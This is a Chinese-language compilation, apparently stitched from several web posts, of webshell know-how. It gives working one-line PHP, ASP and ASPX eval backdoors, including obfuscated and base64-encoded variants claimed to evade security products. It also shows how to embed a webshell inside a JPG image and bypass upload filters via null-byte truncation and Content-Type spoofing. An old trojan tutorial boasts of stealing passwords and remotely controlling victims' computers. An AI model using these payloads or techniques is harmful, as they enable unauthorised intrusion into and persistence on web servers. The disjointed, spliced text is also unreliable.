常见的⼀句话⽊马：php的⼀句话⽊马： <?php @eval($_POST['pass']);?> 或 <?php @eval($_POST['cmd']);?> 或 <?php @eval($_POST['attack']) ;?>asp的⼀句话是： <%eval request ("pass")%>aspx的⼀句话是： <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>⼀句话⽊马制作⽅式1.桌⾯新建⼀个⽂件夹2.在新建的⽂件夹中放⼊三个⽂件，分别为图⽚⽂件tp.jpg，和yjh.php⼀句话⽊马和⼀个写⼊cmd的bat⽂件tp.jpg可⽤任意图⽚yjh.php⽂件⽤notepad++可以创建，保存时⽂件名后缀改为.php即可，⽂件中的内容为<?php @eval($_POST['cmd']);?>.bat⽂件可⽤笔记本创建，保存时⽂件名后缀改为.bat即可，⽂件中的内容为cmd4.双击.bat⽂件进⼊DOS命令，写⼊"copy tp.jpg/b+yjh.php tpyjh.jpg" 回车5.⽂件夹中⾃动⽣成⼀个叫tpyjh.jpg的图⽚⽂件，这个⽂件中就包含⼀句话⽊马，可以拿去上传了, 更多⽹络安全测试技术，请关注公众号“测试运维”，关注测试技术发展；。

一句话木马绕过和防御作者：jaivy若有错误欢迎指正，非常感谢！若有疑问欢迎讨论，共同学习！·WebShellWebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。

中国菜刀可以连接asp、aspx、php、jsp的一句话木马。

·常见的一句话木马Asp：<%eval request("x")%>aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["x"],"unsafe");%> php: <?php @eval($_POST['x']);?>密码均为x一、本地检测及绕过方法·前台文件扩展名检测（弹小框框的一般就是该检测了）（本地漏洞客户端漏洞改扩展名，burp抓包，改回来即可）四种办法绕过，1 . 00截断（两种方式实现，但实质都一样）00截断原理：计算机遇到'\0'字符，就认为字符串结束了。

（可以联系c语言字符串后面自动添加了一个‘\0’来判断是否到达末尾来理解）方法一：在hex中修改（在16进制中修改）找到文件名pass.php.jpg对应的地方把2e改为00（【2e】是字符【.】对应的hex值）方法二直接在.php后面加上%00然后选中%00，对其进行url-decode 处理方法三：直接用在.php后面加上【’\0’】（但此方法是有时无效）方法四：直接把【pass.php.jpg改为pass.php】·content-type参数检测（修改数据包content-type）ContentType 一般参数有application/x-cdf 应用型文件text/HTML 文本image/JPEG jpg 图片image/GIF gif图片把ContentType 由application/x-cdf改为image/gif·文件内容检测：文件内容检测脚本中getimagesize(string filename)函数会通过读取文件头，返回图片的长、宽等信息，如果没有相关的图片文件头，函数会报错，是一种比较严的防御措施。

木马教程（从菜鸟级别入手的哦！）01-10-18 13:17 发表于：《狂人聚义堂》分类：未分类1、什么是木马木马当然不是幼儿园里小朋友的玩具（可偏偏有人还这么认为过），而是一种远程控制软件。

在金山毒霸，瑞星等杀毒软件的眼里，木马是病毒，是“带有恶意性质的黑客工具”。

木马一般分为客户端（client）和服务端（server），客户端就是你自己使用的各种命令的控制台，服务端则是要给别人运行，只有当运行过服务端的电脑才能够“完全由你控制”！2、木马有什么用是不是曾有人在你面前炫耀过他能搞到别人的上网帐号？或者是五六位数的QQ密码？或者是网友的玉照：）？在你没有认识木马前，这些炫耀者在你眼里无疑是神秘而崇拜的，可是当你读完全篇《木马菜鸟入门教程》后，你也可以轻易做到这个了！木马既然能够远程控制别人的计算机，那么它的计算机上的一切就都是你的，对你来说，他已毫无秘密可言。

3、怎样防范和清除木马对于菜鸟来说，防范木马最简单和直接的办法就是装上一个或几个保险的防火墙，如天网、blackice等，再就是杀毒和杀木马软件，现在最好的是两种--金山毒霸和木马克星。

可以这么说，如果你电脑里没有这两种软件，你还是不要上网玩木马的好！即使没有用过木马的人也一定听说过冰河这个响亮的名字，冰河是国产木马中的精品，是佼佼者！即使现在看来它不是木马中最好的，但也是木马中用得最多的，在中国，据说中冰河的机器就已达到几十万台！每一台电脑都对应有自己的独一无二IP，就像是人的指纹一样，要控制一台中木马的电脑，就首先要知道他的IP地址。

通过“连接”这个地址，你就达到了远程控制他人电脑的目的。

我在本站首页也谈过《怎样使用冰河进行远程控制》了，自己去看。

再说几个在使用木马中的常见问题：1、局域网IP问题这个问题是网友问得最多的了，网吧你知道吧？对了，网吧就是一个局域网！局域网的电脑由一台或多台主机和许许多多的分机组成，所以除了主机外，所有分机都会有两个IP，一个是外部IP（对外显示为根主机一致的IP），再就是内部IP，由主机分配，一般形式为（192.16.0.1或10.192.0.1等）当一台网吧的电脑中了木马时，我们该连接那个IP呢？如果中木马的是分机，答案是内部IP！如果是主机，不用说，就是他的唯一的IP了。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

⼀句话⽊马：ASPX篇aspx⽊马收集：<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>随⽇期变化的连接密码, 服务端写法：<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format(" {0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>例如：菜⼑的密码为chopper，在前⾯加三个字符,新密码为：{D}chopper<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%><script runat="server" language="JScript">function popup(str) {var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}</script><%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>密码 z<%@ Page Language="Jscript" validateRequest="false" %><%var kengkeng = Request.Item["never"];Response.Write(eval(keng,"unsafe"));%><%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>密码 -7<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>密码 abcd<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>过狗过D盾⼀句话<%@ Page Language="Jscript" Debug=true%><%vara=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0=")); var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));var c=eval(a,b);eval(c,b);%><%@ Page Language="Jscript" Debug=true%><%var a=Request.Form["pass"];var b="unsa",c="fe",d=b+c;function fun(){return a;}eval(fun(),d);%>。